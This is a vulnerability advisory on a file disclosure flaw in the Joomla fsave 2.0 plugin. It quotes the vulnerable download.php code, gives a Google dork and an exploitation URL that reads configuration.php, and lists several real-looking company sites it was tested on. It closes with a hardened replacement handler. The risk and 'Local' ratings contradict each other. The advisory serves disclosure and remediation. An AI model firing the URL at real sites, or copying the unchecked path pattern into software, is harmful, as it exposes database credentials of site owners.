Joomla Fsave 2.0 Local File Disclosure

2016.01.20
Credit: KnocKout
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Joomla <= (fsave Plugin) Local File Disclosure Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author   : KnocKout
[~] Contact  : knockout@e-mail.com.tr
[~] Skype    : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Greetz   : b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App.         : Joomla
|~Plugin           : fsave
|~Affected Version : 2.0
|~Software         : N/A
|~RISK             : High
|~Google Dork      : inurl:plugins/content/fsave/
===================================================================
======================Info=========================================
The database password is easy to obtain: reading "configuration.php"
is sufficient, and it is possible to read files on the local server.
The cause is incorrect, careless coding in the "download.php" file.
The code is laughable for that reason :)

============ Error lines in download.php ===========================
<?php
define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__)))));
// The user-controlled 'filename' parameter is appended to the site root
// with no validation, so any readable file under that path is served.
$file = JPATH_BASE."/".$_GET['filename'];
header('Content-Description: File Transfer');
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=".basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header("Content-Length: " . filesize($file));
ob_clean();
flush();
readfile($file);
?>
======================================================================
======================== Tested on Demos ============================
http://www.gedore.pl
http://www.gedore.com.pl
http://www.rhodius.pl
http://rhodius.com.pl
http://loesomat.pl
http://carolus.com.pl
http://klann.pl
=======================================================================
========================= Exploitation ====================
http://[TARGET]/plugins/content/fsave/download.php?filename=configuration.php
=======================================================================
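
A hardened version of the download handler shown above, as an added example (not code from the advisory or from the fsave plugin). It assumes downloadable files live in one dedicated directory; the "media/fsave" path and the resolve_download() helper are hypothetical names chosen for illustration.

```php
<?php
// Added example: hardened form of the download.php logic quoted in the advisory.
// ASSUMPTION: files offered for download live in one dedicated directory.
// "media/fsave" and resolve_download() are hypothetical, not the plugin's own.
define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__)))));
define('DOWNLOAD_DIR', JPATH_BASE . '/media/fsave');

// Map a user-supplied name to a regular file inside $baseDir, or return null.
function resolve_download($baseDir, $name)
{
    if (!is_string($name) || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() drops any directory part; realpath() resolves ".." and symlinks.
    $path = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    if ($path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit inside the download directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Never serve server-side code or configuration, even if it ends up here.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (in_array($ext, array('php', 'phtml', 'ini', 'htaccess'), true)) {
        return null;
    }
    return $path;
}

$name = isset($_GET['filename']) ? $_GET['filename'] : null;
$file = resolve_download(DOWNLOAD_DIR, $name);
if ($file === null) {
    http_response_code(404);
    exit;
}
$safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($file));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $safeName . '"');
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . filesize($file));
readfile($file);
```

With this check, a request for filename=configuration.php returns 404 because the resolved file is outside the download directory and has a blocked extension.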



Copyright 2024, cxsecurity.com

 
